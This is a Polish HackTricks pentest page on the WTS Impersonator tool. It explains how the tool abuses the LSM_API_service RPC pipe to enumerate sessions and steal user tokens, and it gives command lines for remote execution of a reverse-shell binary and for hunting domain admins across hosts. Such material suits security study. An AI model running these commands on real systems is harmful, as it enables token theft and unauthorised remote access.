hacktricks/windows-hardening/stealing-credentials/WTS-Impersonator.md
2024-02-11 01:46:25 +00:00

4.4 KiB

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Narzędzie WTS Impersonator wykorzystuje nazwaną rurę RPC "\pipe\LSM_API_service" do dyskretnego wyliczania zalogowanych użytkowników i przejmowania ich tokenów, omijając tradycyjne techniki podrobienia tokenów. Ta metoda ułatwia płynne poruszanie się po sieciach. Innowacyjność tej techniki przypisuje się Omri Baso, którego praca jest dostępna na GitHubie.

Główne funkcje

Narzędzie działa poprzez sekwencję wywołań API:

WTSEnumerateSessionsA  WTSQuerySessionInformationA  WTSQueryUserToken  CreateProcessAsUserW

Kluczowe moduły i użycie

  • Wyszukiwanie użytkowników: Narzędzie umożliwia lokalne i zdalne wyszukiwanie użytkowników za pomocą odpowiednich poleceń:
  • Lokalnie:
.\WTSImpersonator.exe -m enum
  • Zdalnie, poprzez podanie adresu IP lub nazwy hosta:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • Wykonywanie poleceń: Moduły exec i exec-remote wymagają kontekstu Usługi do działania. Lokalne wykonanie poleceń wymaga jedynie pliku wykonywalnego WTSImpersonator i polecenia:
  • Przykład wykonania lokalnego polecenia:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • Aby uzyskać kontekst usługi, można użyć PsExec64.exe:
.\PsExec64.exe -accepteula -s cmd.exe
  • Zdalne wykonanie poleceń: Polega na tworzeniu i instalowaniu usługi zdalnie, podobnie jak w przypadku PsExec.exe, umożliwiając wykonanie z odpowiednimi uprawnieniami.
  • Przykład zdalnego wykonania:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • Moduł łowcy użytkowników: Celuje w określonych użytkowników na wielu maszynach, wykonując kod w oparciu o ich poświadczenia. Jest to szczególnie przydatne do celowania w administratorów domeny posiadających lokalne uprawnienia administratora na kilku systemach.
  • Przykład użycia:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: